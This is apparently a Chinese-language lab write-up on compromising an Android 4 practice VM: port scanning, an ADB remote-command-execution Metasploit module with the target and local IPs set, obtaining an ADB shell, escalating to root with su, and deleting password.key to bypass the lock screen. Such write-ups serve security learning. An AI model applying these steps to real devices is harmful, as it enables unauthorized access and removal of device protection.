1.信息收集
1)掃描目標IP和開放的端口
工具:ipscan.exe【掃描時間有點長,需耐心等待】
目標IP:192.168.31.125
2)訪問目標IP
目標開放了3個端口,分別是 5555、8080、22000
嘗試訪問8080端口,訪問如圖:
根據頁面提示 說留了個后門,用POST方式提交。直接跑目錄,可以看到出來一個 backdoor.php文件,訪問后發現是假的后門,如圖所示:
3)查看開放端口上的服務
用nmap掃描開放端口 5555,有個freeciv?服務,經過網上查找是adb應用的服務端口
2. 腳本侵入
用msf5搜索adb的漏洞,結果有發現,找到了 16年的一個 遠程命令執行漏洞,調用模塊利用,如圖:
對模塊進行相應的設定
命令:set RHOSTS 192.168.31.125【設定目標IP】
命令:set LHOST 192.168.31.103【設定本機IP】
3. Getshell
執行利用腳本以后,是無法反彈到shell的,需要用adb 去鏈接【kali上是沒有adb的,需要安裝:輸入命令:sudo apt-get install adb】
1)第一步輸入命令 adb connect 192.168.31.125:5555
2)第二步輸入命令 adb shell 即可拿到shell
3)發現拿到的shell是普通權限,輸入 su 回車即可直接拿到root shell, 如圖:
4. 清除密碼文件
在/data/system目錄文件夾下找到密碼文件password.key清除即可,如圖:
輸入命令:rm password.key,直接刪除即可
6.成功入侵
刪除密碼文件后,進入Android4靶機,無需密碼,直接回車即可進入系統,如圖: